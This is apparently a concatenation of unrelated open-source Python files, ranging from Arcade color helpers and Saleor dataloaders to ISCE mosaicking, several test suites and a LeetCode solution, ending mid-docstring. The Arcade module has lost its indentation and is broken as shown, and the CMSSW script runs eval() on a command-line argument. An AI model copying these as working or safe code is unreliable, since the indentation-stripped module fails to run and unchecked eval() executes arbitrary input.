"""
Functions used to support drawing. No Pyglet/OpenGL here.
"""
import math
from typing import Tuple, Union, cast
from arcade import Color
from arcade import RGBA, RGB
def get_points_for_thick_line(start_x: float, start_y: float,
end_x: float, end_y: float,
line_width: float):
"""
    Function used internally for Arcade. OpenGL draws triangles only, so a thick
line must be two triangles that make up a rectangle. This calculates those
points.
"""
vector_x = start_x - end_x
vector_y = start_y - end_y
perpendicular_x = vector_y
perpendicular_y = -vector_x
length = math.sqrt(vector_x * vector_x + vector_y * vector_y)
if length == 0:
normal_x = 1.0
normal_y = 1.0
else:
normal_x = perpendicular_x / length
normal_y = perpendicular_y / length
r1_x = start_x + normal_x * line_width / 2
r1_y = start_y + normal_y * line_width / 2
r2_x = start_x - normal_x * line_width / 2
r2_y = start_y - normal_y * line_width / 2
r3_x = end_x + normal_x * line_width / 2
r3_y = end_y + normal_y * line_width / 2
r4_x = end_x - normal_x * line_width / 2
r4_y = end_y - normal_y * line_width / 2
points = (r1_x, r1_y), (r2_x, r2_y), (r4_x, r4_y), (r3_x, r3_y)
return points
def get_four_byte_color(color: Color) -> RGBA:
"""
Given a RGB list, it will return RGBA.
Given a RGBA list, it will return the same RGBA.
:param Color color: Three or four byte tuple
    :returns: Four byte RGBA tuple
"""
if len(color) == 4:
return cast(RGBA, color)
elif len(color) == 3:
return color[0], color[1], color[2], 255
else:
raise ValueError("This isn't a 3 or 4 byte color")
def get_four_float_color(color: Color) -> Tuple[float, float, float, float]:
"""
Given a 3 or 4 RGB/RGBA color where each color goes 0-255, this
returns a RGBA tuple where each item is a scaled float from 0 to 1.
:param Color color: Three or four byte tuple
:return: Four floats as a RGBA tuple
"""
if len(color) == 4:
return color[0] / 255, color[1] / 255, color[2] / 255, color[3] / 255 # type: ignore
elif len(color) == 3:
return color[0] / 255, color[1] / 255, color[2] / 255, 1.0
else:
raise ValueError("This isn't a 3 or 4 byte color")
def get_three_float_color(color: Color) -> Tuple[float, float, float]:
"""
Given a 3 or 4 RGB/RGBA color where each color goes 0-255, this
    returns an RGB tuple where each item is a scaled float from 0 to 1.
:param Color color: Three or four byte tuple
:return: Three floats as a RGB tuple
"""
if len(color) == 4 or len(color) == 3:
return color[0] / 255, color[1] / 255, color[2] / 255 # type: ignore
else:
raise ValueError("This isn't a 3 or 4 byte color")
def make_transparent_color(color: Color, transparency: float):
"""
Given a RGB color, along with an alpha, returns a RGBA color tuple.
:param Color color: Three or four byte RGBA color
:param float transparency: Transparency
"""
return color[0], color[1], color[2], transparency
def uint24_to_three_byte_color(color: int) -> RGB:
"""
Given an int between 0 and 16777215, return a RGB color tuple.
:param int color: 3 byte int
"""
return (color & (255 << 16)) >> 16, (color & (255 << 8)) >> 8, color & 255
def uint32_to_four_byte_color(color: int) -> RGBA:
"""
Given an int between 0 and 4294967295, return a RGBA color tuple.
:param int color: 4 byte int
"""
return (color & (255 << 24)) >> 24, (color & (255 << 16)) >> 16, (color & (255 << 8)) >> 8, color & 255
def color_from_hex_string(code: str) -> RGBA:
"""
Make a color from a hex code (3, 4, 6 or 8 characters of hex, normally with a hashtag)
"""
code = code.lstrip("#")
if len(code) <= 4:
code = "".join(i + "0" for i in code)
if len(code) == 6:
# full opacity if no alpha specified
return int(code[0:2], 16), int(code[2:4], 16), int(code[4:6], 16), 255
elif len(code) == 8:
return int(code[2:4], 16), int(code[4:6], 16), int(code[6:8], 16), int(code[0:2], 16)
raise ValueError("Improperly formatted color passed to color_from_hex")
def float_to_byte_color(
color: Union[Tuple[float, float, float, float], Tuple[float, float, float]],
) -> Color:
"""
    Converts a float color to a byte color.
    This works for 3 or 4-component colors.
"""
if len(color) == 3:
return int(color[0] * 255), int(color[1] * 255), int(color[2] * 255)
elif len(color) == 4:
color = cast(Tuple[float, float, float, float], color)
return int(color[0] * 255), int(color[1] * 255), int(color[2] * 255), int(color[3] * 255)
else:
raise ValueError(f"color needs to have 3 or 4 components, not {color}")
|
L1Trigger/L1TMuonEndCap/test/tools/print_sector.py | ckamtsikis/cmssw | 852 | 12748882 |
#!/usr/bin/env python
from __future__ import print_function
import sys
from math import degrees, pi
def main():
if len(sys.argv) < 2:
print("Usage: %s radian" % sys.argv[0])
return
rad = eval(sys.argv[1])
if rad <= 0.:
rad += 2*pi
deg = degrees(rad)
print("rad: {0} deg: {1}".format(rad, deg))
sector = int((deg - 15)/60.) + 1
print("{0:d}".format(sector))
return
# ______________________________________________________________________________
if __name__ == '__main__':
main()
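# Worked example of the sector formula above (angles chosen for illustration,
# not taken from CMSSW): 1.0 rad is about 57.3 deg, so int((57.3 - 15)/60.) + 1
# gives sector 1; pi rad (180 deg) gives int((180 - 15)/60.) + 1 = 3.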
|
saleor/graphql/channel/dataloaders.py | fairhopeweb/saleor | 15,337 | 12748908 | from collections import defaultdict
from django.db.models import Exists, OuterRef
from ...channel.models import Channel
from ...order.models import Order
from ...shipping.models import ShippingZone
from ..checkout.dataloaders import CheckoutByIdLoader, CheckoutLineByIdLoader
from ..core.dataloaders import DataLoader
from ..order.dataloaders import OrderByIdLoader, OrderLineByIdLoader
from ..shipping.dataloaders import ShippingZoneByIdLoader
class ChannelByIdLoader(DataLoader):
context_key = "channel_by_id"
def batch_load(self, keys):
channels = Channel.objects.in_bulk(keys)
return [channels.get(channel_id) for channel_id in keys]
class ChannelBySlugLoader(DataLoader):
context_key = "channel_by_slug"
def batch_load(self, keys):
channels = Channel.objects.in_bulk(keys, field_name="slug")
return [channels.get(slug) for slug in keys]
class ChannelByCheckoutLineIDLoader(DataLoader):
context_key = "channel_by_checkout_line"
def batch_load(self, keys):
def channel_by_lines(checkout_lines):
checkout_ids = [line.checkout_id for line in checkout_lines]
def channels_by_checkout(checkouts):
channel_ids = [checkout.channel_id for checkout in checkouts]
return ChannelByIdLoader(self.context).load_many(channel_ids)
return (
CheckoutByIdLoader(self.context)
.load_many(checkout_ids)
.then(channels_by_checkout)
)
return (
CheckoutLineByIdLoader(self.context).load_many(keys).then(channel_by_lines)
)
class ChannelByOrderLineIdLoader(DataLoader):
context_key = "channel_by_orderline"
def batch_load(self, keys):
def channel_by_lines(order_lines):
order_ids = [line.order_id for line in order_lines]
def channels_by_checkout(orders):
channel_ids = [order.channel_id for order in orders]
return ChannelByIdLoader(self.context).load_many(channel_ids)
return (
OrderByIdLoader(self.context)
.load_many(order_ids)
.then(channels_by_checkout)
)
return OrderLineByIdLoader(self.context).load_many(keys).then(channel_by_lines)
class ChannelWithHasOrdersByIdLoader(DataLoader):
context_key = "channel_with_has_orders_by_id"
def batch_load(self, keys):
orders = Order.objects.filter(channel=OuterRef("pk"))
channels = Channel.objects.annotate(has_orders=Exists(orders)).in_bulk(keys)
return [channels.get(channel_id) for channel_id in keys]
class ShippingZonesByChannelIdLoader(DataLoader):
context_key = "shippingzone_by_channel"
def batch_load(self, keys):
zone_and_channel_is_pairs = ShippingZone.objects.filter(
channels__id__in=keys
).values_list("pk", "channels__id")
channel_shipping_zone_map = defaultdict(list)
for zone_id, channel_id in zone_and_channel_is_pairs:
channel_shipping_zone_map[channel_id].append(zone_id)
def map_shipping_zones(shipping_zones):
zone_map = {zone.pk: zone for zone in shipping_zones}
return [
[zone_map[zone_id] for zone_id in channel_shipping_zone_map[channel_id]]
for channel_id in keys
]
return (
ShippingZoneByIdLoader(self.context)
.load_many({pk for pk, _ in zone_and_channel_is_pairs})
.then(map_shipping_zones)
)
|
venv/lib/python3.9/site-packages/py2app/bootstrap/reset_sys_path.py | dequeb/asmbattle | 193 | 12748926 | def _reset_sys_path():
# Clear generic sys.path[0]
import os
import sys
resources = os.environ["RESOURCEPATH"]
while sys.path[0] == resources:
del sys.path[0]
_reset_sys_path()
|
src/seedwork/infrastructure/test_repository.py | Ermlab/python-ddd | 308 | 12748929 | from seedwork.infrastructure.repository import InMemoryRepository
from seedwork.domain.entities import Entity
class Person(Entity):
first_name: str
last_name: str
def test_InMemoryRepository_persist_one():
# arrange
person = Person(first_name="John", last_name="Doe")
repository = InMemoryRepository()
# act
repository.insert(person)
# assert
assert repository.get_by_id(person.id) == person
def test_InMemoryRepository_persist_two():
# arrange
person1 = Person(first_name="John", last_name="Doe")
person2 = Person(first_name="Mary", last_name="Doe")
repository = InMemoryRepository()
# act
repository.insert(person1)
repository.insert(person2)
# assert
assert repository.get_by_id(person1.id) == person1
assert repository.get_by_id(person2.id) == person2
|
components/isceobj/Alos2burstProc/runSwathMosaic.py | vincentschut/isce2 | 1,133 | 12748932 | #
# Author: <NAME>
# Copyright 2015-present, NASA-JPL/Caltech
#
import os
import logging
import isceobj
from isceobj.Alos2Proc.runSwathMosaic import swathMosaic
from isceobj.Alos2Proc.runSwathMosaic import swathMosaicParameters
from isceobj.Alos2Proc.Alos2ProcPublic import create_xml
logger = logging.getLogger('isce.alos2burstinsar.runSwathMosaic')
def runSwathMosaic(self):
'''mosaic subswaths
'''
catalog = isceobj.Catalog.createCatalog(self._insar.procDoc.name)
self.updateParamemetersFromUser()
referenceTrack = self._insar.loadTrack(reference=True)
secondaryTrack = self._insar.loadTrack(reference=False)
for i, frameNumber in enumerate(self._insar.referenceFrames):
frameDir = 'f{}_{}'.format(i+1, frameNumber)
os.chdir(frameDir)
mosaicDir = 'mosaic'
os.makedirs(mosaicDir, exist_ok=True)
os.chdir(mosaicDir)
if self._insar.endingSwath-self._insar.startingSwath+1 == 1:
import shutil
swathDir = 's{}'.format(referenceTrack.frames[i].swaths[0].swathNumber)
if not os.path.isfile(self._insar.interferogram):
os.symlink(os.path.join('../', swathDir, self._insar.interferogram), self._insar.interferogram)
shutil.copy2(os.path.join('../', swathDir, self._insar.interferogram+'.vrt'), self._insar.interferogram+'.vrt')
shutil.copy2(os.path.join('../', swathDir, self._insar.interferogram+'.xml'), self._insar.interferogram+'.xml')
if not os.path.isfile(self._insar.amplitude):
os.symlink(os.path.join('../', swathDir, self._insar.amplitude), self._insar.amplitude)
shutil.copy2(os.path.join('../', swathDir, self._insar.amplitude+'.vrt'), self._insar.amplitude+'.vrt')
shutil.copy2(os.path.join('../', swathDir, self._insar.amplitude+'.xml'), self._insar.amplitude+'.xml')
# os.rename(os.path.join('../', swathDir, self._insar.interferogram), self._insar.interferogram)
# os.rename(os.path.join('../', swathDir, self._insar.interferogram+'.vrt'), self._insar.interferogram+'.vrt')
# os.rename(os.path.join('../', swathDir, self._insar.interferogram+'.xml'), self._insar.interferogram+'.xml')
# os.rename(os.path.join('../', swathDir, self._insar.amplitude), self._insar.amplitude)
# os.rename(os.path.join('../', swathDir, self._insar.amplitude+'.vrt'), self._insar.amplitude+'.vrt')
# os.rename(os.path.join('../', swathDir, self._insar.amplitude+'.xml'), self._insar.amplitude+'.xml')
#update frame parameters
#########################################################
frame = referenceTrack.frames[i]
infImg = isceobj.createImage()
infImg.load(self._insar.interferogram+'.xml')
#mosaic size
frame.numberOfSamples = infImg.width
frame.numberOfLines = infImg.length
#NOTE THAT WE ARE STILL USING SINGLE LOOK PARAMETERS HERE
#range parameters
frame.startingRange = frame.swaths[0].startingRange
frame.rangeSamplingRate = frame.swaths[0].rangeSamplingRate
frame.rangePixelSize = frame.swaths[0].rangePixelSize
#azimuth parameters
frame.sensingStart = frame.swaths[0].sensingStart
frame.prf = frame.swaths[0].prf
frame.azimuthPixelSize = frame.swaths[0].azimuthPixelSize
frame.azimuthLineInterval = frame.swaths[0].azimuthLineInterval
#update frame parameters, secondary
#########################################################
frame = secondaryTrack.frames[i]
#mosaic size
frame.numberOfSamples = int(frame.swaths[0].numberOfSamples/self._insar.numberRangeLooks1)
frame.numberOfLines = int(frame.swaths[0].numberOfLines/self._insar.numberAzimuthLooks1)
#NOTE THAT WE ARE STILL USING SINGLE LOOK PARAMETERS HERE
#range parameters
frame.startingRange = frame.swaths[0].startingRange
frame.rangeSamplingRate = frame.swaths[0].rangeSamplingRate
frame.rangePixelSize = frame.swaths[0].rangePixelSize
#azimuth parameters
frame.sensingStart = frame.swaths[0].sensingStart
frame.prf = frame.swaths[0].prf
frame.azimuthPixelSize = frame.swaths[0].azimuthPixelSize
frame.azimuthLineInterval = frame.swaths[0].azimuthLineInterval
os.chdir('../')
#save parameter file
self._insar.saveProduct(referenceTrack.frames[i], self._insar.referenceFrameParameter)
self._insar.saveProduct(secondaryTrack.frames[i], self._insar.secondaryFrameParameter)
os.chdir('../')
continue
#choose offsets
numberOfFrames = len(referenceTrack.frames)
numberOfSwaths = len(referenceTrack.frames[i].swaths)
if self.swathOffsetMatching:
#no need to do this as the API support 2-d list
#rangeOffsets = (np.array(self._insar.swathRangeOffsetMatchingReference)).reshape(numberOfFrames, numberOfSwaths)
#azimuthOffsets = (np.array(self._insar.swathAzimuthOffsetMatchingReference)).reshape(numberOfFrames, numberOfSwaths)
rangeOffsets = self._insar.swathRangeOffsetMatchingReference
azimuthOffsets = self._insar.swathAzimuthOffsetMatchingReference
else:
#rangeOffsets = (np.array(self._insar.swathRangeOffsetGeometricalReference)).reshape(numberOfFrames, numberOfSwaths)
#azimuthOffsets = (np.array(self._insar.swathAzimuthOffsetGeometricalReference)).reshape(numberOfFrames, numberOfSwaths)
rangeOffsets = self._insar.swathRangeOffsetGeometricalReference
azimuthOffsets = self._insar.swathAzimuthOffsetGeometricalReference
rangeOffsets = rangeOffsets[i]
azimuthOffsets = azimuthOffsets[i]
#list of input files
inputInterferograms = []
inputAmplitudes = []
for j, swathNumber in enumerate(range(self._insar.startingSwath, self._insar.endingSwath + 1)):
swathDir = 's{}'.format(swathNumber)
inputInterferograms.append(os.path.join('../', swathDir, self._insar.interferogram))
inputAmplitudes.append(os.path.join('../', swathDir, self._insar.amplitude))
#note that frame parameters are updated after mosaicking
#mosaic amplitudes
swathMosaic(referenceTrack.frames[i], inputAmplitudes, self._insar.amplitude,
rangeOffsets, azimuthOffsets, self._insar.numberRangeLooks1, self._insar.numberAzimuthLooks1, resamplingMethod=0)
#mosaic interferograms
swathMosaic(referenceTrack.frames[i], inputInterferograms, self._insar.interferogram,
rangeOffsets, azimuthOffsets, self._insar.numberRangeLooks1, self._insar.numberAzimuthLooks1, updateFrame=True, resamplingMethod=1)
create_xml(self._insar.amplitude, referenceTrack.frames[i].numberOfSamples, referenceTrack.frames[i].numberOfLines, 'amp')
create_xml(self._insar.interferogram, referenceTrack.frames[i].numberOfSamples, referenceTrack.frames[i].numberOfLines, 'int')
#update secondary frame parameters here
#no matching for secondary, always use geometry
rangeOffsets = self._insar.swathRangeOffsetGeometricalSecondary
azimuthOffsets = self._insar.swathAzimuthOffsetGeometricalSecondary
rangeOffsets = rangeOffsets[i]
azimuthOffsets = azimuthOffsets[i]
swathMosaicParameters(secondaryTrack.frames[i], rangeOffsets, azimuthOffsets, self._insar.numberRangeLooks1, self._insar.numberAzimuthLooks1)
os.chdir('../')
#save parameter file
self._insar.saveProduct(referenceTrack.frames[i], self._insar.referenceFrameParameter)
self._insar.saveProduct(secondaryTrack.frames[i], self._insar.secondaryFrameParameter)
os.chdir('../')
#mosaic spectral diversity interferograms
for i, frameNumber in enumerate(self._insar.referenceFrames):
frameDir = 'f{}_{}'.format(i+1, frameNumber)
os.chdir(frameDir)
mosaicDir = 'mosaic'
os.makedirs(mosaicDir, exist_ok=True)
os.chdir(mosaicDir)
if self._insar.endingSwath-self._insar.startingSwath+1 == 1:
import shutil
swathDir = 's{}'.format(referenceTrack.frames[i].swaths[0].swathNumber)
for sdFile in self._insar.interferogramSd:
if not os.path.isfile(sdFile):
os.symlink(os.path.join('../', swathDir, 'spectral_diversity', sdFile), sdFile)
shutil.copy2(os.path.join('../', swathDir, 'spectral_diversity', sdFile+'.vrt'), sdFile+'.vrt')
shutil.copy2(os.path.join('../', swathDir, 'spectral_diversity', sdFile+'.xml'), sdFile+'.xml')
os.chdir('../')
os.chdir('../')
continue
#choose offsets
numberOfFrames = len(referenceTrack.frames)
numberOfSwaths = len(referenceTrack.frames[i].swaths)
if self.swathOffsetMatching:
#no need to do this as the API support 2-d list
#rangeOffsets = (np.array(self._insar.swathRangeOffsetMatchingReference)).reshape(numberOfFrames, numberOfSwaths)
#azimuthOffsets = (np.array(self._insar.swathAzimuthOffsetMatchingReference)).reshape(numberOfFrames, numberOfSwaths)
rangeOffsets = self._insar.swathRangeOffsetMatchingReference
azimuthOffsets = self._insar.swathAzimuthOffsetMatchingReference
else:
#rangeOffsets = (np.array(self._insar.swathRangeOffsetGeometricalReference)).reshape(numberOfFrames, numberOfSwaths)
#azimuthOffsets = (np.array(self._insar.swathAzimuthOffsetGeometricalReference)).reshape(numberOfFrames, numberOfSwaths)
rangeOffsets = self._insar.swathRangeOffsetGeometricalReference
azimuthOffsets = self._insar.swathAzimuthOffsetGeometricalReference
rangeOffsets = rangeOffsets[i]
azimuthOffsets = azimuthOffsets[i]
#list of input files
inputSd = [[], [], []]
for j, swathNumber in enumerate(range(self._insar.startingSwath, self._insar.endingSwath + 1)):
swathDir = 's{}'.format(swathNumber)
for k, sdFile in enumerate(self._insar.interferogramSd):
inputSd[k].append(os.path.join('../', swathDir, 'spectral_diversity', sdFile))
#mosaic spectral diversity interferograms
for inputSdList, outputSdFile in zip(inputSd, self._insar.interferogramSd):
swathMosaic(referenceTrack.frames[i], inputSdList, outputSdFile,
rangeOffsets, azimuthOffsets, self._insar.numberRangeLooks1, self._insar.numberAzimuthLooks1, updateFrame=False, phaseCompensation=True, pcRangeLooks=5, pcAzimuthLooks=5, filt=True, resamplingMethod=1)
for sdFile in self._insar.interferogramSd:
create_xml(sdFile, referenceTrack.frames[i].numberOfSamples, referenceTrack.frames[i].numberOfLines, 'int')
os.chdir('../')
os.chdir('../')
catalog.printToLog(logger, "runSwathMosaic")
self._insar.procDoc.addAllFromCatalog(catalog)
|
manubot/cite/tests/test_pubmed.py | benstear/manubot | 299 | 12748972 | import pytest
from manubot.cite.pubmed import (
get_pmcid_and_pmid_for_doi,
get_pmid_for_doi,
get_pubmed_ids_for_doi,
)
@pytest.mark.parametrize(
("doi", "pmid"),
[
("10.1098/rsif.2017.0387", "29618526"), # in PubMed and PMC
("10.1161/CIRCGENETICS.115.001181", "27094199"), # in PubMed but not PMC
("10.7717/peerj-cs.134", None), # DOI in journal not indexed by PubMed
("10.1161/CIRC", None), # invalid DOI
],
)
def test_get_pmid_for_doi(doi, pmid):
output = get_pmid_for_doi(doi)
assert pmid == output
@pytest.mark.parametrize(
("doi", "id_dict"),
[
("10.1098/rsif.2017.0387", {"PMCID": "PMC5938574", "PMID": "29618526"}),
("10.7554/ELIFE.32822", {"PMCID": "PMC5832410", "PMID": "29424689"}),
("10.1161/CIRCGENETICS.115.001181", {}), # only in PubMed, not in PMC
("10.7717/peerj.000", {}), # Non-existent DOI
("10.peerj.000", {}), # malformed DOI
],
)
def test_get_pmcid_and_pmid_for_doi(doi, id_dict):
output = get_pmcid_and_pmid_for_doi(doi)
assert id_dict == output
@pytest.mark.parametrize(
("doi", "id_dict"),
[
("10.1098/rsif.2017.0387", {"PMCID": "PMC5938574", "PMID": "29618526"}),
("10.7554/ELIFE.32822", {"PMCID": "PMC5832410", "PMID": "29424689"}),
(
"10.1161/CIRCGENETICS.115.001181",
{"PMID": "27094199"},
), # only in PubMed, not in PMC
("10.7717/peerj.000", {}), # Non-existent DOI
],
)
def test_get_pubmed_ids_for_doi(doi, id_dict):
output = get_pubmed_ids_for_doi(doi)
assert id_dict == output
|
Python/split-a-string-in-balanced-strings.py | shreyventure/LeetCode-Solutions | 388 | 12749011 | class Solution:
"""
Time Complexity: O(N)
Space Complexity: O(1)
"""
def balanced_string_split(self, s: str) -> int:
# initialize variables
L_count, R_count = 0, 0
balanced_substring_count = 0
# parse the string
for char in s:
# update the number of Ls and the number of Rs so far
if char == 'L':
L_count += 1
elif char == 'R':
R_count += 1
# if the string is balanced, increment the balanced substrings count and reset the counters
if L_count == R_count:
balanced_substring_count += 1
L_count, R_count = 0, 0
return balanced_substring_count
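# Illustrative usage of the counter-based approach above; the input string is an
# assumed example, not part of the original solution file.
if __name__ == "__main__":
    # "RLRRLLRLRL" splits into "RL", "RRLL", "RL", "RL" -> 4 balanced pieces
    print(Solution().balanced_string_split("RLRRLLRLRL"))  # expected output: 4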
|
Chapter10/webapp/blog/models.py | jayakumardhananjayan/pythonwebtut | 135 | 12749019 | import datetime
from .. import db
tags = db.Table(
'post_tags',
db.Column('post_id', db.Integer, db.ForeignKey('post.id')),
db.Column('tag_id', db.Integer, db.ForeignKey('tag.id'))
)
class Post(db.Model):
id = db.Column(db.Integer(), primary_key=True)
title = db.Column(db.String(255), nullable=False)
text = db.Column(db.Text(), nullable=False)
publish_date = db.Column(db.DateTime(), default=datetime.datetime.now)
user_id = db.Column(db.Integer(), db.ForeignKey('user.id'))
comments = db.relationship(
'Comment',
backref='post',
lazy='dynamic'
)
tags = db.relationship(
'Tag',
secondary=tags,
backref=db.backref('posts', lazy='dynamic')
)
def __init__(self, title=""):
self.title = title
def __repr__(self):
return "<Post '{}'>".format(self.title)
class Comment(db.Model):
id = db.Column(db.Integer(), primary_key=True)
name = db.Column(db.String(255), nullable=False)
text = db.Column(db.Text(), nullable=False)
date = db.Column(db.DateTime(), default=datetime.datetime.now)
post_id = db.Column(db.Integer(), db.ForeignKey('post.id'))
def __repr__(self):
return "<Comment '{}'>".format(self.text[:15])
class Tag(db.Model):
id = db.Column(db.Integer(), primary_key=True)
title = db.Column(db.String(255), nullable=False, unique=True)
def __init__(self, title=""):
self.title = title
def __repr__(self):
return "<Tag '{}'>".format(self.title)
class Reminder(db.Model):
id = db.Column(db.Integer(), primary_key=True)
date = db.Column(db.DateTime())
email = db.Column(db.String())
text = db.Column(db.Text())
def __repr__(self):
return "<Reminder '{}'>".format(self.text[:20])
|
tests/data/test_unsupervised_sampler.py | LarsNeR/stellargraph | 2,428 | 12749027 |
# -*- coding: utf-8 -*-
#
# Copyright 2017-2020 Data61, CSIRO
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import numpy as np
from collections import defaultdict
from stellargraph.data.unsupervised_sampler import UnsupervisedSampler
from stellargraph.data.explorer import UniformRandomWalk
from ..test_utils.graphs import line_graph
def test_init_parameters(line_graph):
# if no graph is provided
with pytest.raises(ValueError):
UnsupervisedSampler(G=None)
# walk must have length strictly greater than 1
with pytest.raises(ValueError):
UnsupervisedSampler(G=line_graph, length=1)
# at least 1 walk from each root node
with pytest.raises(ValueError):
UnsupervisedSampler(G=line_graph, number_of_walks=0)
    # the nodes parameter should be an iterable of node IDs
with pytest.raises(ValueError):
UnsupervisedSampler(G=line_graph, nodes=1)
    # if no root nodes are provided for sampling, default to using all nodes as root nodes
sampler = UnsupervisedSampler(G=line_graph, nodes=None)
assert sampler.nodes == list(line_graph.nodes())
def test_run_batch_sizes(line_graph):
batch_size = 4
sampler = UnsupervisedSampler(G=line_graph, length=2, number_of_walks=2)
batches = sampler.run(batch_size)
# check batch sizes
assert len(batches) == np.ceil(len(line_graph.nodes()) * 4 / batch_size)
for ids, labels in batches[:-1]:
assert len(ids) == len(labels) == batch_size
# last batch can be smaller
ids, labels = batches[-1]
assert len(ids) == len(labels)
assert len(ids) <= batch_size
def test_run_context_pairs(line_graph):
batch_size = 4
sampler = UnsupervisedSampler(G=line_graph, length=2, number_of_walks=2)
batches = sampler.run(batch_size)
grouped_by_target = defaultdict(list)
for ids, labels in batches:
for (target, context), label in zip(ids, labels):
grouped_by_target[target].append((context, label))
assert len(grouped_by_target) == len(line_graph.nodes())
for target, sampled in grouped_by_target.items():
# exactly 2 positive and 2 negative context pairs for each target node
assert len(sampled) == 4
# since each walk has length = 2, there must be an edge between each positive context pair
for context, label in sampled:
if label == 1:
assert context in set(line_graph.neighbors(target))
def test_walker_uniform_random(line_graph):
length = 3
number_of_walks = 2
batch_size = 4
walker = UniformRandomWalk(line_graph, n=number_of_walks, length=length)
sampler = UnsupervisedSampler(line_graph, walker=walker)
batches = sampler.run(batch_size)
# batches should match the parameters used to create the walker object, instead of the defaults
# for UnsupervisedSampler
expected_num_batches = np.ceil(
line_graph.number_of_nodes() * number_of_walks * (length - 1) * 2 / batch_size
)
assert len(batches) == expected_num_batches
class CustomWalker:
def run(self, nodes):
return [[node, node] for node in nodes]
def test_walker_custom(line_graph):
walker = CustomWalker()
sampler = UnsupervisedSampler(line_graph, walker=walker)
batches = sampler.run(2)
assert len(batches) == line_graph.number_of_nodes()
# all positive examples should be self loops, since we defined our custom walker this way
for context_pairs, labels in batches:
for node, neighbour in context_pairs[labels == 1]:
assert node == neighbour
def test_ignored_param_warning(line_graph):
walker = UniformRandomWalk(line_graph, n=2, length=3)
with pytest.raises(ValueError, match="cannot specify both 'walker' and 'length'"):
UnsupervisedSampler(line_graph, walker=walker, length=5)
with pytest.raises(
ValueError, match="cannot specify both 'walker' and 'number_of_walks'"
):
UnsupervisedSampler(line_graph, walker=walker, number_of_walks=5)
with pytest.raises(ValueError, match="cannot specify both 'walker' and 'seed'"):
UnsupervisedSampler(line_graph, walker=walker, seed=1)
|
Programming Languages/Python/Theory/100_Python_Exercises/Exercises/Exercise 28/28.py | jaswinder9051998/Resources | 101 | 12749144 |
#Why does the error occur and how do you fix it?
#A: A TypeError means you are using the wrong type in an operation. foo() prints the sum and returns None, so None * 10 raises a TypeError. Change print(a + b) to return a + b (a corrected sketch is appended below).
def foo(a, b):
print(a + b)
x = foo(2, 3) * 10
|
core/native/vendor/cx_Freeze-5.0.1/cx_Freeze/samples/simple/hello.py | tensorlang/nao | 332 | 12749152 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from datetime import datetime
import sys
from sys import stdout
stdout.write('Hello from cx_Freeze\n')
stdout.write('The current date is %s\n\n' %
datetime.today().strftime('%B %d, %Y %H:%M:%S'))
stdout.write('Executable: %r\n' % sys.executable)
stdout.write('Prefix: %r\n' % sys.prefix)
stdout.write('Default encoding: %r\n' % sys.getdefaultencoding())
stdout.write('File system encoding: %r\n\n' % sys.getfilesystemencoding())
stdout.write('ARGUMENTS:\n')
for a in sys.argv:
stdout.write('%s\n' % a)
stdout.write('\n')
stdout.write('PATH:\n')
for p in sys.path:
stdout.write('%s\n' % p)
stdout.write('\n')
|
lite/tests/unittest_py/op/test_linspace_op.py | 714627034/Paddle-Lite | 808 | 12749159 | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
sys.path.append('../')
from auto_scan_test import AutoScanTest, IgnoreReasons
from program_config import TensorConfig, ProgramConfig, OpConfig, CxxConfig, TargetType, PrecisionType, DataLayoutType, Place
import unittest
import hypothesis
from hypothesis import given, settings, seed, example, assume
import hypothesis.strategies as st
import argparse
import numpy as np
from functools import partial
class TestLinspaceOp(AutoScanTest):
def __init__(self, *args, **kwargs):
AutoScanTest.__init__(self, *args, **kwargs)
self.enable_testing_on_place(
TargetType.Host,
PrecisionType.FP32,
DataLayoutType.NCHW,
thread=[1, 2])
def is_program_valid(self,
program_config: ProgramConfig,
predictor_config: CxxConfig) -> bool:
return True
def sample_program_configs(self, draw):
start_id = draw(st.integers(min_value=0, max_value=5))
stop_id = draw(st.integers(min_value=50, max_value=60))
num_data = draw(st.integers(min_value=1, max_value=10))
op_type_str = draw(st.sampled_from(
[5])) #2:int 5:float, lite only support float
def generate_start1(*args, **kwargs):
return np.array([float(start_id)]).astype(np.float32)
def generate_start2(*args, **kwargs):
return np.array([int(start_id)]).astype(np.int32)
def generate_stop1(*args, **kwargs):
return np.array([float(stop_id)]).astype(np.float32)
def generate_stop2(*args, **kwargs):
return np.array([int(stop_id)]).astype(np.int32)
def generate_num(*args, **kwargs):
return np.array([int(num_data)]).astype(np.int32)
build_ops = OpConfig(
type="linspace",
inputs={
"Start": ["start_data"],
"Stop": ["stop_data"],
"Num": ["num_data"],
},
outputs={"Out": ["output_data"], },
attrs={"dtype": int(op_type_str)})
if op_type_str == 2:
program_config = ProgramConfig(
ops=[build_ops],
weights={},
inputs={
"start_data":
TensorConfig(data_gen=partial(generate_start2)),
"stop_data":
TensorConfig(data_gen=partial(generate_stop2)),
"num_data": TensorConfig(data_gen=partial(generate_num)),
},
outputs=["output_data"])
elif op_type_str == 5:
program_config = ProgramConfig(
ops=[build_ops],
weights={},
inputs={
"start_data":
TensorConfig(data_gen=partial(generate_start1)),
"stop_data":
TensorConfig(data_gen=partial(generate_stop1)),
"num_data": TensorConfig(data_gen=partial(generate_num)),
},
outputs=["output_data"])
return program_config
def sample_predictor_configs(self):
return self.get_predictor_configs(), ["linspace"], (1e-5, 1e-5)
def add_ignore_pass_case(self):
pass
def test(self, *args, **kwargs):
self.run_and_statis(quant=False, max_examples=25)
if __name__ == "__main__":
unittest.main(argv=[''])
|
scripts/cmt/rig/spaceswitch.py | kamilisa/cmt | 199 | 12749173 | """Space switching without constraints or extra DAG nodes.
Contains functions to create a space switching network as well as to switch seamlessly
between spaces.
Example Usage
=============
::
import cmt.rig.spaceswitch as spaceswitch
# Create the space switch
spaceswitch.create_space_switch(
pole_vector_control,
[(ik_control, "foot"), (root_control, "root"), (world_control, "world")],
switch_attribute="space",
use_rotate=False,
)
# Seamless switch
